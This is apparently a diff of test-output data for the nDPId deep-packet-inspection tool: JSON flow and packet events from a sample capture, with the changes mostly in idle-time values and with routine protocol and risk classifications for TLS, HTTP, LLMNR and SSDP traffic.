-00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1470104381238,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104381238,"pkt":"ABAj4ACgYMVHBbyMCABFAAAo9WxAAEAGS7fAqAUQwKhzS9F3AbseAeEWRPEhV1AQIABdlQAAcnZlcjBd"} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104381237,"flow_last_seen":1470104381239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104381239,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01095{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":514,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381237,"flow_last_seen":1470104381243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1470104381243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381237,"flow_last_seen":1470104381237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104381237,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1470104381237,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104381237,"pkt":"ABAj4ACgYMVHBbyMCABFAABAk\/BAAEAGrRvAqAUQwKhzS9F3AbseAeEVAAAAALAC\/\/84nQAAAgQFtAEDAwUBAQgKGg8YWwAAAAAEAgAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1470104381238,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381238,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XdE8SFWHgHhFoASFtAl8wAAAgQFtAEBBAIBAwMH"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1470104381238,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104381238,"pkt":"ABAj4ACgYMVHBbyMCABFAAAo9WxAAEAGS7fAqAUQwKhzS9F3AbseAeEWRPEhV1AQIABdlQAAcnZlcjBd"} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104381237,"flow_last_seen":1470104381239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104381239,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01095{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":514,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381237,"flow_last_seen":1470104381243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1470104381243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1470104381626,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104381626,"pkt":"AQBeAAD8CJ4BzeuNCABFAAA2U7AAAAERvz3AqAUl4AAA\/NwuFOsAIuU8ydMAAAABAAAAAAAACG5vdGVib29rAAD\/AAE="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381895,"flow_last_seen":1470104381895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104381895,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1470104381895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381895,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Ui5AAIAGjNDAqHMIt4MwkcHMAFBbXvEQAAAAAIACIAAlhwAAAgQE7AEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1470104381895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381895,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Ui5AAIAGjNDAqHMIt4MwkcHMAFBbXvEQAAAAAIACIAAlhwAAAgQE7AEDAwgBAQQC"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381895,"flow_last_seen":1470104381895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104381895,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1470104381895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381895,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Ui5AAIAGjNDAqHMIt4MwkcHMAFBbXvEQAAAAAIACIAAlhwAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1470104381895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381895,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Ui5AAIAGjNDAqHMIt4MwkcHMAFBbXvEQAAAAAIACIAAlhwAAAgQE7AEDAwgBAQQC"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":554,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1470104381935,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104381935,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J0MAAAERi63AqGUh4AAA\/ORYFOsAI152CJsAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} 00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":554,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} @@ -211,16 +211,16 @@ 00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381935,"flow_last_seen":1470104381935,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104381935,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1470104381935,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104381935,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClQRQAAAQRv1\/AqAUy7\/\/\/+vyiB2wAkVLKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1470104381935,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104381935,"pkt":"AQBef\/\/6SNIkYwreCABFAAChfiEAAAERhV\/AqAUp7\/\/\/+tgQB2wAjcOhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1470104381968,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1470104381968,"pkt":"ABxCjnAxTF4M6gNlCABFAAAsAABAADEGLge3gzCRwKhzCABQwcyPbNg5W17xEWASOQjNFQAAAgQFtAAA"} -01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381895,"flow_last_seen":1470104381978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1470104381978,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"183.131.48.145","url":"183.131.48.145\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8","code":0,"content_type":"","user_agent":""}} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1470104381968,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1470104381968,"pkt":"ABxCjnAxTF4M6gNlCABFAAAsAABAADEGLge3gzCRwKhzCABQwcyPbNg5W17xEWASOQjNFQAAAgQFtAAA"} +01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381895,"flow_last_seen":1470104381978,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1470104381978,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"183.131.48.145","url":"183.131.48.145\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8","code":0,"content_type":"","user_agent":""}} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1470104382036,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104382036,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J0UAAAERi6vAqGUh4AAA\/ORYFOsAI152CJsAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1470104382038,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104382038,"pkt":"AQBeAAD8cPGh+Cr9CABFAAA3fUUAAAERlcPAqAUJ4AAA\/ORYFOsAI76OCJsAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382053,"flow_last_seen":1470104382053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104382053,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1470104382053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104382053,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UjJAAIAGjM3AqHMIt4MwkMHNAFBSJ8A7AAAAAIACIABfkwAAAgQE7AEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1470104382053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104382053,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UjJAAIAGjM3AqHMIt4MwkMHNAFBSJ8A7AAAAAIACIABfkwAAAgQE7AEDAwgBAQQC"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1470104382122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1470104382122,"pkt":"ABxCjnAxTF4M6gNlCABFAAAsAABAADEGLgi3gzCQwKhzCABQwc0rYeLSUifAPGASOQhglAAAAgQFtAAA"} -01280{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104382053,"flow_last_seen":1470104382125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1470104382125,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":0,"content_type":"","user_agent":""}} -01304{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":582,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104382053,"flow_last_seen":1470104382192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":1287,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1470104382192,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Media"},"http": {"hostname":"183.131.48.144","url":"183.131.48.144\/vlive.qqvideo.tc.qq.com\/u0020mkrnds.p1203.1.mp4?vkey=7AB139BF6B32F53747E8FF192E6FE557B3A3D644C034E34BF6EAEB4E0774F2A92EF3AC5C007520BB925E5C8A18E6D302C2DAE0A295B26AA8FD1DC8069D47CE1B4A16A56870BD1ACA3E86ABE4C079659DB2182FC71217AB68CCD344CE65694457E3F53549CD617D5C9F671A26C70DC68F93F1D7BCD017762F&guid=F5EB01CC01A8E08CD83630828DE17C2B02162FD8&locid=a06f98fd-fa26-44e5-acc5-0d83f9df03af&size=9418655&ocid=253564332","code":206,"content_type":"video\/mp4","user_agent":""}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382053,"flow_last_seen":1470104382053,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104382053,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1470104382053,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104382053,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UjJAAIAGjM3AqHMIt4MwkMHNAFBSJ8A7AAAAAIACIABfkwAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1470104382053,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104382053,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UjJAAIAGjM3AqHMIt4MwkMHNAFBSJ8A7AAAAAIACIABfkwAAAgQE7AEDAwgBAQQC"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1470104382122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1470104382122,"pkt":"ABxCjnAxTF4M6gNlCABFAAAsAABAADEGLgi3gzCQwKhzCABQwc0rYeLSUifAPGASOQhglAAAAgQFtAAA"} +01280{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104382053,"flow_last_seen":1470104382125,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1470104382125,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 